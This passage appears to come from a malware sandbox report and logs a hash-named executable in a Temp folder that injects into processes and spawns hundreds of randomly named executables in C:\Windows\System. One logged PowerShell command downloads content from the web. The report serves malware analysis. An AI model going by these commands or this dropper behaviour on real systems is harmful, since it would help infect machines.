PID 3212 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\pyyHgjv.exe
PID 3212 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\pyyHgjv.exe
PID 3212 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\Burqpzn.exe
PID 3212 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\Burqpzn.exe
PID 3212 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\XDZxNQE.exe
PID 3212 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\XDZxNQE.exe
PID 3212 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OuNGpZq.exe
PID 3212 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OuNGpZq.exe
PID 3212 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ILGXdDw.exe
PID 3212 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ILGXdDw.exe
PID 3212 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\TAOyIgC.exe
PID 3212 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\TAOyIgC.exe
PID 3212 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RdtjIlK.exe
PID 3212 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RdtjIlK.exe
PID 3212 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qUtHKyC.exe
PID 3212 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qUtHKyC.exe
PID 3212 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ygtUIca.exe
PID 3212 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ygtUIca.exe
PID 3212 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\JJjLlUH.exe
PID 3212 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\JJjLlUH.exe
PID 3212 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ScQKdch.exe
PID 3212 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ScQKdch.exe
PID 3212 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\trEJEmh.exe
PID 3212 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\trEJEmh.exe
PID 3212 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nKADzeH.exe
PID 3212 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nKADzeH.exe
PID 3212 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ybHZLWM.exe
PID 3212 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\ybHZLWM.exe
PID 3212 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\AmtaodT.exe
PID 3212 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\AmtaodT.exe
PID 3212 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RLvenfC.exe
PID 3212 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\RLvenfC.exe
PID 3212 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\whoZHnc.exe
PID 3212 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\whoZHnc.exe
PID 3212 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\zoOJLVN.exe
PID 3212 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\zoOJLVN.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe

"C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\axVNZQz.exe

C:\Windows\System\axVNZQz.exe

C:\Windows\System\aPjGTGe.exe

C:\Windows\System\aPjGTGe.exe

C:\Windows\System\EWdOxVy.exe

C:\Windows\System\EWdOxVy.exe

C:\Windows\System\brHqTLB.exe

C:\Windows\System\brHqTLB.exe

C:\Windows\System\IBMKRWO.exe

C:\Windows\System\IBMKRWO.exe

C:\Windows\System\sOalaow.exe

C:\Windows\System\sOalaow.exe

C:\Windows\System\qndCowM.exe

C:\Windows\System\qndCowM.exe

C:\Windows\System\PpisgNH.exe

C:\Windows\System\PpisgNH.exe

C:\Windows\System\urUyRME.exe

C:\Windows\System\urUyRME.exe

C:\Windows\System\nwWVnrF.exe

C:\Windows\System\nwWVnrF.exe

C:\Windows\System\OwTpFMC.exe

C:\Windows\System\OwTpFMC.exe

C:\Windows\System\SwCQmTw.exe

C:\Windows\System\SwCQmTw.exe

C:\Windows\System\bLpZMhH.exe

C:\Windows\System\bLpZMhH.exe

C:\Windows\System\pyyHgjv.exe

C:\Windows\System\pyyHgjv.exe

C:\Windows\System\Burqpzn.exe

C:\Windows\System\Burqpzn.exe

C:\Windows\System\XDZxNQE.exe

C:\Windows\System\XDZxNQE.exe

C:\Windows\System\OuNGpZq.exe

C:\Windows\System\OuNGpZq.exe

C:\Windows\System\ILGXdDw.exe

C:\Windows\System\ILGXdDw.exe

C:\Windows\System\TAOyIgC.exe

C:\Windows\System\TAOyIgC.exe

C:\Windows\System\RdtjIlK.exe

C:\Windows\System\RdtjIlK.exe

C:\Windows\System\qUtHKyC.exe

C:\Windows\System\qUtHKyC.exe

C:\Windows\System\ygtUIca.exe

C:\Windows\System\ygtUIca.exe

C:\Windows\System\JJjLlUH.exe

C:\Windows\System\JJjLlUH.exe

C:\Windows\System\ScQKdch.exe

C:\Windows\System\ScQKdch.exe

C:\Windows\System\trEJEmh.exe

C:\Windows\System\trEJEmh.exe

C:\Windows\System\nKADzeH.exe

C:\Windows\System\nKADzeH.exe

C:\Windows\System\ybHZLWM.exe

C:\Windows\System\ybHZLWM.exe

C:\Windows\System\AmtaodT.exe

C:\Windows\System\AmtaodT.exe

C:\Windows\System\RLvenfC.exe

C:\Windows\System\RLvenfC.exe

C:\Windows\System\whoZHnc.exe

C:\Windows\System\whoZHnc.exe

C:\Windows\System\zoOJLVN.exe

C:\Windows\System\zoOJLVN.exe

C:\Windows\System\SyqIKiE.exe

C:\Windows\System\SyqIKiE.exe

C:\Windows\System\JwmkKWr.exe

C:\Windows\System\JwmkKWr.exe

C:\Windows\System\uomMsCL.exe

C:\Windows\System\uomMsCL.exe

C:\Windows\System\qfsgPNK.exe

C:\Windows\System\qfsgPNK.exe

C:\Windows\System\ZLHJgrb.exe

C:\Windows\System\ZLHJgrb.exe

C:\Windows\System\UpmNNNc.exe

C:\Windows\System\UpmNNNc.exe

C:\Windows\System\jSHSNNo.exe

C:\Windows\System\jSHSNNo.exe

C:\Windows\System\KjzBcML.exe

C:\Windows\System\KjzBcML.exe

C:\Windows\System\bxLGsnI.exe

C:\Windows\System\bxLGsnI.exe

C:\Windows\System\HghtKZy.exe

C:\Windows\System\HghtKZy.exe

C:\Windows\System\HlheYaz.exe

C:\Windows\System\HlheYaz.exe

C:\Windows\System\DtakIIV.exe

C:\Windows\System\DtakIIV.exe

C:\Windows\System\KSLmDSj.exe

C:\Windows\System\KSLmDSj.exe

C:\Windows\System\UVEbZRA.exe

C:\Windows\System\UVEbZRA.exe

C:\Windows\System\EYBfZjX.exe

C:\Windows\System\EYBfZjX.exe

C:\Windows\System\eRDrLDn.exe

C:\Windows\System\eRDrLDn.exe

C:\Windows\System\Eokyjbl.exe

C:\Windows\System\Eokyjbl.exe

C:\Windows\System\mgRmMZb.exe

C:\Windows\System\mgRmMZb.exe

C:\Windows\System\nOqNTFJ.exe

C:\Windows\System\nOqNTFJ.exe

C:\Windows\System\glLEVTL.exe

C:\Windows\System\glLEVTL.exe

C:\Windows\System\CplFYAK.exe

C:\Windows\System\CplFYAK.exe

C:\Windows\System\uZyViSu.exe

C:\Windows\System\uZyViSu.exe

C:\Windows\System\zbFLVEz.exe

C:\Windows\System\zbFLVEz.exe

C:\Windows\System\uoPtpCa.exe

C:\Windows\System\uoPtpCa.exe

C:\Windows\System\seXQAAj.exe

C:\Windows\System\seXQAAj.exe

C:\Windows\System\IlhRTZJ.exe

C:\Windows\System\IlhRTZJ.exe

C:\Windows\System\mnIGCht.exe

C:\Windows\System\mnIGCht.exe

C:\Windows\System\PFwZwRy.exe

C:\Windows\System\PFwZwRy.exe

C:\Windows\System\buusUZo.exe

C:\Windows\System\buusUZo.exe

C:\Windows\System\ErfkTej.exe

C:\Windows\System\ErfkTej.exe

C:\Windows\System\TRdfIRQ.exe

C:\Windows\System\TRdfIRQ.exe

C:\Windows\System\BKhgDAT.exe

C:\Windows\System\BKhgDAT.exe

C:\Windows\System\zgMDbxO.exe

C:\Windows\System\zgMDbxO.exe

C:\Windows\System\ommsLKu.exe

C:\Windows\System\ommsLKu.exe

C:\Windows\System\AuNLKLZ.exe

C:\Windows\System\AuNLKLZ.exe

C:\Windows\System\gtSReBv.exe

C:\Windows\System\gtSReBv.exe

C:\Windows\System\EyySyoh.exe

C:\Windows\System\EyySyoh.exe

C:\Windows\System\gUWvuLK.exe

C:\Windows\System\gUWvuLK.exe

C:\Windows\System\eajXYrT.exe

C:\Windows\System\eajXYrT.exe

C:\Windows\System\TFborHa.exe

C:\Windows\System\TFborHa.exe

C:\Windows\System\uMCyArA.exe

C:\Windows\System\uMCyArA.exe

C:\Windows\System\aQfBRpG.exe

C:\Windows\System\aQfBRpG.exe

C:\Windows\System\NXIkbaK.exe

C:\Windows\System\NXIkbaK.exe

C:\Windows\System\RSVFSKj.exe

C:\Windows\System\RSVFSKj.exe

C:\Windows\System\SbzIlWd.exe

C:\Windows\System\SbzIlWd.exe

C:\Windows\System\ecSyMaF.exe

C:\Windows\System\ecSyMaF.exe

C:\Windows\System\UtMtgIZ.exe

C:\Windows\System\UtMtgIZ.exe

C:\Windows\System\xhIyEbV.exe

C:\Windows\System\xhIyEbV.exe

C:\Windows\System\rSVfnmb.exe

C:\Windows\System\rSVfnmb.exe

C:\Windows\System\RbzuliS.exe

C:\Windows\System\RbzuliS.exe

C:\Windows\System\wFdxZtN.exe

C:\Windows\System\wFdxZtN.exe

C:\Windows\System\MMGUVvb.exe

C:\Windows\System\MMGUVvb.exe

C:\Windows\System\xyOygCh.exe

C:\Windows\System\xyOygCh.exe

C:\Windows\System\kcrLFqD.exe

C:\Windows\System\kcrLFqD.exe

C:\Windows\System\iMzlkeC.exe

C:\Windows\System\iMzlkeC.exe

C:\Windows\System\ArvkLiO.exe

C:\Windows\System\ArvkLiO.exe

C:\Windows\System\ytOVIbZ.exe

C:\Windows\System\ytOVIbZ.exe

C:\Windows\System\ThEEWXB.exe

C:\Windows\System\ThEEWXB.exe

C:\Windows\System\lAXkGjG.exe

C:\Windows\System\lAXkGjG.exe

C:\Windows\System\hkKXvOL.exe

C:\Windows\System\hkKXvOL.exe

C:\Windows\System\nVYsmke.exe

C:\Windows\System\nVYsmke.exe

C:\Windows\System\aaCvphv.exe

C:\Windows\System\aaCvphv.exe

C:\Windows\System\KUEyxzr.exe

C:\Windows\System\KUEyxzr.exe

C:\Windows\System\BGYPcvR.exe

C:\Windows\System\BGYPcvR.exe

C:\Windows\System\fzVdRMQ.exe

C:\Windows\System\fzVdRMQ.exe

C:\Windows\System\wDzdBke.exe

C:\Windows\System\wDzdBke.exe

C:\Windows\System\daAsNnI.exe

C:\Windows\System\daAsNnI.exe

C:\Windows\System\MJcKTxA.exe

C:\Windows\System\MJcKTxA.exe

C:\Windows\System\nsNzJer.exe

C:\Windows\System\nsNzJer.exe

C:\Windows\System\NslDvfo.exe

C:\Windows\System\NslDvfo.exe

C:\Windows\System\CwkutbX.exe

C:\Windows\System\CwkutbX.exe

C:\Windows\System\qMDyPbX.exe

C:\Windows\System\qMDyPbX.exe

C:\Windows\System\oPMPPdf.exe

C:\Windows\System\oPMPPdf.exe

C:\Windows\System\ewmwWXv.exe

C:\Windows\System\ewmwWXv.exe

C:\Windows\System\iQsGVrP.exe

C:\Windows\System\iQsGVrP.exe

C:\Windows\System\XzGxJjE.exe

C:\Windows\System\XzGxJjE.exe

C:\Windows\System\NxSZemC.exe

C:\Windows\System\NxSZemC.exe

C:\Windows\System\FIFvYuY.exe

C:\Windows\System\FIFvYuY.exe

C:\Windows\System\xiohMMz.exe

C:\Windows\System\xiohMMz.exe

C:\Windows\System\rePdsqK.exe

C:\Windows\System\rePdsqK.exe

C:\Windows\System\ovGIlTb.exe

C:\Windows\System\ovGIlTb.exe

C:\Windows\System\XXrtiVb.exe

C:\Windows\System\XXrtiVb.exe

C:\Windows\System\kzaKLOg.exe

C:\Windows\System\kzaKLOg.exe

C:\Windows\System\GbXZZOZ.exe

C:\Windows\System\GbXZZOZ.exe

C:\Windows\System\bwGemzi.exe

C:\Windows\System\bwGemzi.exe

C:\Windows\System\rqFyKMG.exe

C:\Windows\System\rqFyKMG.exe

C:\Windows\System\cFXBTYz.exe

C:\Windows\System\cFXBTYz.exe

C:\Windows\System\geAhvdI.exe

C:\Windows\System\geAhvdI.exe

C:\Windows\System\GCNxGTE.exe

C:\Windows\System\GCNxGTE.exe

C:\Windows\System\prezFSo.exe

C:\Windows\System\prezFSo.exe

C:\Windows\System\TCKITrY.exe

C:\Windows\System\TCKITrY.exe

C:\Windows\System\pyyhtvx.exe

C:\Windows\System\pyyhtvx.exe

C:\Windows\System\UtCPioV.exe

C:\Windows\System\UtCPioV.exe

C:\Windows\System\zgyMzjd.exe

C:\Windows\System\zgyMzjd.exe

C:\Windows\System\AgtMWSS.exe

C:\Windows\System\AgtMWSS.exe

C:\Windows\System\gOKMywz.exe

C:\Windows\System\gOKMywz.exe

C:\Windows\System\Aqmpvhx.exe

C:\Windows\System\Aqmpvhx.exe

C:\Windows\System\oXvXJKS.exe

C:\Windows\System\oXvXJKS.exe

C:\Windows\System\grUqtrL.exe

C:\Windows\System\grUqtrL.exe

C:\Windows\System\IyvbttH.exe

C:\Windows\System\IyvbttH.exe

C:\Windows\System\bRPpaBq.exe

C:\Windows\System\bRPpaBq.exe

C:\Windows\System\xoUxVLh.exe

C:\Windows\System\xoUxVLh.exe

C:\Windows\System\DVQOvMD.exe

C:\Windows\System\DVQOvMD.exe

C:\Windows\System\VJkVCDM.exe

C:\Windows\System\VJkVCDM.exe

C:\Windows\System\tcUVORN.exe

C:\Windows\System\tcUVORN.exe

C:\Windows\System\TZZBYYV.exe

C:\Windows\System\TZZBYYV.exe

C:\Windows\System\wfKxxkq.exe

C:\Windows\System\wfKxxkq.exe

C:\Windows\System\AZPQtLy.exe

C:\Windows\System\AZPQtLy.exe

C:\Windows\System\clPnfKK.exe

C:\Windows\System\clPnfKK.exe

C:\Windows\System\EtQVBCr.exe

C:\Windows\System\EtQVBCr.exe

C:\Windows\System\MqsPXrL.exe

C:\Windows\System\MqsPXrL.exe

C:\Windows\System\rnomGct.exe

C:\Windows\System\rnomGct.exe

C:\Windows\System\inpyqIp.exe

C:\Windows\System\inpyqIp.exe

C:\Windows\System\jopjFvT.exe

C:\Windows\System\jopjFvT.exe

C:\Windows\System\WkxZzRN.exe

C:\Windows\System\WkxZzRN.exe

C:\Windows\System\oRqXRKS.exe

C:\Windows\System\oRqXRKS.exe

C:\Windows\System\gPuOPYN.exe

C:\Windows\System\gPuOPYN.exe

C:\Windows\System\RGtVlOb.exe

C:\Windows\System\RGtVlOb.exe

C:\Windows\System\YekRVxL.exe

C:\Windows\System\YekRVxL.exe

C:\Windows\System\dwWYgpe.exe

C:\Windows\System\dwWYgpe.exe

C:\Windows\System\PgIlVer.exe

C:\Windows\System\PgIlVer.exe

C:\Windows\System\zirjchu.exe

C:\Windows\System\zirjchu.exe

C:\Windows\System\ubsHomx.exe

C:\Windows\System\ubsHomx.exe

C:\Windows\System\TnuzhVw.exe

C:\Windows\System\TnuzhVw.exe

C:\Windows\System\zkWzoTN.exe

C:\Windows\System\zkWzoTN.exe

C:\Windows\System\OKtDFbV.exe

C:\Windows\System\OKtDFbV.exe

C:\Windows\System\BOmbTxL.exe

C:\Windows\System\BOmbTxL.exe

C:\Windows\System\ocRVxfK.exe

C:\Windows\System\ocRVxfK.exe

C:\Windows\System\Mhusulm.exe

C:\Windows\System\Mhusulm.exe

C:\Windows\System\VZPyVKx.exe

C:\Windows\System\VZPyVKx.exe

C:\Windows\System\gyErbaz.exe

C:\Windows\System\gyErbaz.exe

C:\Windows\System\eAmeZAa.exe

C:\Windows\System\eAmeZAa.exe

C:\Windows\System\LkpsDyY.exe

C:\Windows\System\LkpsDyY.exe

C:\Windows\System\ZRCePpC.exe

C:\Windows\System\ZRCePpC.exe

C:\Windows\System\vEoitWT.exe

C:\Windows\System\vEoitWT.exe

C:\Windows\System\AYprNoP.exe

C:\Windows\System\AYprNoP.exe

C:\Windows\System\QhZiYPp.exe

C:\Windows\System\QhZiYPp.exe

C:\Windows\System\SgBkJOM.exe

C:\Windows\System\SgBkJOM.exe

C:\Windows\System\wwxdwmG.exe

C:\Windows\System\wwxdwmG.exe

C:\Windows\System\KLiVFub.exe

C:\Windows\System\KLiVFub.exe

C:\Windows\System\imfpwix.exe

C:\Windows\System\imfpwix.exe

C:\Windows\System\FYrqkGW.exe

C:\Windows\System\FYrqkGW.exe

C:\Windows\System\RHqjTjw.exe

C:\Windows\System\RHqjTjw.exe

C:\Windows\System\qKvjIWK.exe

C:\Windows\System\qKvjIWK.exe

C:\Windows\System\LRYoKFU.exe

C:\Windows\System\LRYoKFU.exe

C:\Windows\System\NZswjtY.exe

C:\Windows\System\NZswjtY.exe

C:\Windows\System\YFGVMSR.exe

C:\Windows\System\YFGVMSR.exe

C:\Windows\System\UWfjsoa.exe

C:\Windows\System\UWfjsoa.exe

C:\Windows\System\LulYPcq.exe

C:\Windows\System\LulYPcq.exe

C:\Windows\System\sMqtzdl.exe

C:\Windows\System\sMqtzdl.exe

C:\Windows\System\OZzoRJE.exe

C:\Windows\System\OZzoRJE.exe

C:\Windows\System\wzZVEVC.exe

C:\Windows\System\wzZVEVC.exe

C:\Windows\System\EXjBJFz.exe

C:\Windows\System\EXjBJFz.exe

C:\Windows\System\gPvOrkv.exe

C:\Windows\System\gPvOrkv.exe

C:\Windows\System\lhgIdhN.exe

C:\Windows\System\lhgIdhN.exe

C:\Windows\System\rZwKkfe.exe

C:\Windows\System\rZwKkfe.exe

C:\Windows\System\vjdVfUH.exe

C:\Windows\System\vjdVfUH.exe

C:\Windows\System\NfdviEF.exe

C:\Windows\System\NfdviEF.exe

C:\Windows\System\lqhVoso.exe

C:\Windows\System\lqhVoso.exe

C:\Windows\System\BVrEoGw.exe

C:\Windows\System\BVrEoGw.exe

C:\Windows\System\gcEpZry.exe

C:\Windows\System\gcEpZry.exe

C:\Windows\System\SPiOSPS.exe

C:\Windows\System\SPiOSPS.exe

C:\Windows\System\JNbnzag.exe

C:\Windows\System\JNbnzag.exe

C:\Windows\System\krpauzh.exe

C:\Windows\System\krpauzh.exe

C:\Windows\System\ILXFEcv.exe

C:\Windows\System\ILXFEcv.exe

C:\Windows\System\UCuKxxr.exe

C:\Windows\System\UCuKxxr.exe

C:\Windows\System\UHbkhej.exe

C:\Windows\System\UHbkhej.exe

C:\Windows\System\OlcuNJy.exe

C:\Windows\System\OlcuNJy.exe

C:\Windows\System\TeJfaqE.exe

C:\Windows\System\TeJfaqE.exe

C:\Windows\System\msNlPXw.exe

C:\Windows\System\msNlPXw.exe

C:\Windows\System\ukFZlFo.exe

C:\Windows\System\ukFZlFo.exe

C:\Windows\System\bdRJNsH.exe

C:\Windows\System\bdRJNsH.exe

C:\Windows\System\cyWPFrM.exe

C:\Windows\System\cyWPFrM.exe

C:\Windows\System\yMPuAeK.exe

C:\Windows\System\yMPuAeK.exe

C:\Windows\System\nrYBxqt.exe

C:\Windows\System\nrYBxqt.exe

C:\Windows\System\vhTqtCx.exe

C:\Windows\System\vhTqtCx.exe

C:\Windows\System\KkFPXkF.exe

C:\Windows\System\KkFPXkF.exe

C:\Windows\System\CbUlczs.exe

C:\Windows\System\CbUlczs.exe

C:\Windows\System\NkJuDxf.exe

C:\Windows\System\NkJuDxf.exe

C:\Windows\System\jTHVCTZ.exe

C:\Windows\System\jTHVCTZ.exe

C:\Windows\System\MmFlZrB.exe

C:\Windows\System\MmFlZrB.exe

C:\Windows\System\xEYRfJB.exe

C:\Windows\System\xEYRfJB.exe

C:\Windows\System\fEoillA.exe

C:\Windows\System\fEoillA.exe

C:\Windows\System\QtwgeSj.exe

C:\Windows\System\QtwgeSj.exe

C:\Windows\System\LDDMagT.exe

C:\Windows\System\LDDMagT.exe

C:\Windows\System\AGhOOgQ.exe

C:\Windows\System\AGhOOgQ.exe

C:\Windows\System\TUYwCRd.exe

C:\Windows\System\TUYwCRd.exe

C:\Windows\System\BmXFNDN.exe

C:\Windows\System\BmXFNDN.exe

C:\Windows\System\xmCWtrt.exe

C:\Windows\System\xmCWtrt.exe

C:\Windows\System\KrcBCLn.exe

C:\Windows\System\KrcBCLn.exe

C:\Windows\System\BsecAAE.exe

C:\Windows\System\BsecAAE.exe

C:\Windows\System\BRoExnP.exe

C:\Windows\System\BRoExnP.exe

C:\Windows\System\cQatYdr.exe

C:\Windows\System\cQatYdr.exe

C:\Windows\System\zLhfEZy.exe

C:\Windows\System\zLhfEZy.exe

C:\Windows\System\GmvzQFZ.exe

C:\Windows\System\GmvzQFZ.exe

C:\Windows\System\PkwpUuF.exe

C:\Windows\System\PkwpUuF.exe

C:\Windows\System\sIBqHLh.exe

C:\Windows\System\sIBqHLh.exe

C:\Windows\System\ALecoVY.exe

C:\Windows\System\ALecoVY.exe

C:\Windows\System\aoirxmg.exe

C:\Windows\System\aoirxmg.exe

C:\Windows\System\bLmNMOo.exe

C:\Windows\System\bLmNMOo.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:8

C:\Windows\System\gdUTbPd.exe

C:\Windows\System\gdUTbPd.exe

C:\Windows\System\YTmAbfJ.exe

C:\Windows\System\YTmAbfJ.exe

C:\Windows\System\aGKxsVA.exe

C:\Windows\System\aGKxsVA.exe

C:\Windows\System\gPjjFEL.exe

C:\Windows\System\gPjjFEL.exe

C:\Windows\System\gTnBiMt.exe

C:\Windows\System\gTnBiMt.exe

C:\Windows\System\RluSSxf.exe

C:\Windows\System\RluSSxf.exe

C:\Windows\System\mLGRxAR.exe

C:\Windows\System\mLGRxAR.exe

C:\Windows\System\PYhJcKy.exe

C:\Windows\System\PYhJcKy.exe

C:\Windows\System\mvrvTvL.exe

C:\Windows\System\mvrvTvL.exe

C:\Windows\System\FmjgszC.exe

C:\Windows\System\FmjgszC.exe

C:\Windows\System\EEHSipw.exe

C:\Windows\System\EEHSipw.exe

C:\Windows\System\BPRwXZi.exe

C:\Windows\System\BPRwXZi.exe

C:\Windows\System\TzrSfha.exe

C:\Windows\System\TzrSfha.exe

C:\Windows\System\NzfOtBr.exe

C:\Windows\System\NzfOtBr.exe

C:\Windows\System\ulGHPoy.exe

C:\Windows\System\ulGHPoy.exe

C:\Windows\System\prfqtiN.exe

C:\Windows\System\prfqtiN.exe

C:\Windows\System\KpLKSWJ.exe

C:\Windows\System\KpLKSWJ.exe

C:\Windows\System\cDSdpoL.exe

C:\Windows\System\cDSdpoL.exe

C:\Windows\System\SKkOctV.exe

C:\Windows\System\SKkOctV.exe

C:\Windows\System\MlHVUnl.exe

C:\Windows\System\MlHVUnl.exe

C:\Windows\System\wIDAEpR.exe

C:\Windows\System\wIDAEpR.exe

C:\Windows\System\WWVIywo.exe

C:\Windows\System\WWVIywo.exe

C:\Windows\System\BYvnBgH.exe

C:\Windows\System\BYvnBgH.exe

C:\Windows\System\nAtAKJm.exe

C:\Windows\System\nAtAKJm.exe

C:\Windows\System\UrEDAty.exe

C:\Windows\System\UrEDAty.exe

C:\Windows\System\NCUiHJS.exe

C:\Windows\System\NCUiHJS.exe

C:\Windows\System\tNTnyAL.exe

C:\Windows\System\tNTnyAL.exe

C:\Windows\System\zKTPYNy.exe

C:\Windows\System\zKTPYNy.exe

C:\Windows\System\qUCcXsQ.exe

C:\Windows\System\qUCcXsQ.exe

C:\Windows\System\QgGJXoU.exe

C:\Windows\System\QgGJXoU.exe

C:\Windows\System\gAUjSws.exe

C:\Windows\System\gAUjSws.exe

C:\Windows\System\rIHUzjR.exe

C:\Windows\System\rIHUzjR.exe

C:\Windows\System\kkkADGh.exe

C:\Windows\System\kkkADGh.exe

C:\Windows\System\jHIheIs.exe

C:\Windows\System\jHIheIs.exe

C:\Windows\System\wOweGKh.exe

C:\Windows\System\wOweGKh.exe

C:\Windows\System\WSUEKHv.exe

C:\Windows\System\WSUEKHv.exe

C:\Windows\System\ZmXbfSK.exe

C:\Windows\System\ZmXbfSK.exe

